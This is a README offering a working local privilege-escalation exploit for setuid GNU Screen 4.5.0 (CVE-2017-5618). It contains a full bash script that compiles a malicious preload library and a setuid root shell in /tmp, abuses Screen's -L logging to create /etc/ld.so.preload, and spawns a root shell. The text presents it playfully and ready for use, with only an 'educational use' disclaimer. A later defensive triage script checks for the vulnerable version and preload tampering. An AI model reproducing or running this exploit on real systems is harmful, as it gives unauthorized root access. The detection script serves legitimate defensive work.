# GNU Screen 4.5.0 Local Privilege Escalation Exploit (CVE-2017-5618)
## 📌 Overview
Local privilege escalation exploit for GNU Screen 4.5.0 that hijacks shared library loading to gain **root access** via `ld.so.preload` manipulation.
## 🔧 Technical Details
- Vulnerability: CVE-2017-5618
- Type: Shared Library Hijacking via `ld.so.preload`
- Affected: GNU Screen 4.5.0 exclusively
- Fixed in: GNU Screen 4.6.0+
## 🎪 The Vulnerability Circus
- CVE: 2017-5618 🎯
- ***The Bug: setuid-root Screen 4.5.0 opens its `-L` log file without properly checking permissions, so the file is created as root with DANGEROUS permissions***
- ***The Magic: We trick it into creating `/etc/ld.so.preload`, which loads our malicious library***
- ***The Payload: Instant root shell! 🐚***
## Script 🗒️
```bash
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2017-5618
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
echo "[+] Triggering..."
screen -ls
/tmp/rootshell
```
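
The script above relies on three things a defender can look for: a setuid Screen 4.5.0 binary, an `/etc/ld.so.preload` that is world-writable or names a library under `/tmp`, and a setuid binary left in `/tmp`. The following triage script is an added example, not part of the original README; the function names are hypothetical, and the `4.05.00` banner string is an assumption about how Screen 4.5.0 reports its version.

```bash
#!/bin/sh
# Added defensive example, not part of the original README.

# True if the banner is Screen 4.5.0. Assumption: `screen --version`
# reports that release as "Screen version 4.05.00 (GNU) ...".
screen_banner_is_450() {
    case "$1" in
        *"Screen version 4.05.00"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print findings for a preload file; return 1 if anything is suspicious.
# Entries in ld.so.preload are separated by whitespace or colons.
audit_preload() {
    file=$1; bad=0
    [ -e "$file" ] || return 0    # absent is the normal state on most hosts
    if [ -n "$(find "$file" -prune -perm -0002)" ]; then
        echo "world-writable preload file: $file"; bad=1
    fi
    hits=$(tr ': \t' '\n\n\n' < "$file" |
           grep -E '^(/tmp|/var/tmp|/dev/shm)/' || true)
    if [ -n "$hits" ]; then
        echo "$hits" | sed 's/^/preload entry in world-writable dir: /'; bad=1
    fi
    return "$bad"
}

# List setuid files under a directory. The preload file is removed once the
# library has run, so a leftover setuid binary in /tmp is the lasting trace.
find_setuid_in() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Run every check against the live host.
triage_host() {
    if bin=$(command -v screen); then
        [ -u "$bin" ] && echo "setuid bit set on $bin"
        screen_banner_is_450 "$("$bin" --version 2>&1)" &&
            echo "Screen 4.5.0 installed: upgrade to 4.6.0 or later"
    fi
    audit_preload /etc/ld.so.preload
    find_setuid_in /tmp
}

if [ "${1:-}" = "--host" ]; then triage_host; fi
```

Run it with `--host` to check the live system. Any output from `audit_preload` or `find_setuid_in` on a host that never had a preload file configured is worth an investigation.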
## Screenshots
> Checking Vulnerable Screen Version.

> Creating The File And Giving Required Permissions.

> Root Access Gained.

> Root shell achieved - full system control
## ⚠️ Warning Label
FOR EDUCATIONAL USE ONLY! ⚠️
Don't be a script kiddie - use this only on systems you own or have explicit permission to test.
## Tested On
TryHackMe KOTH Room - FoodData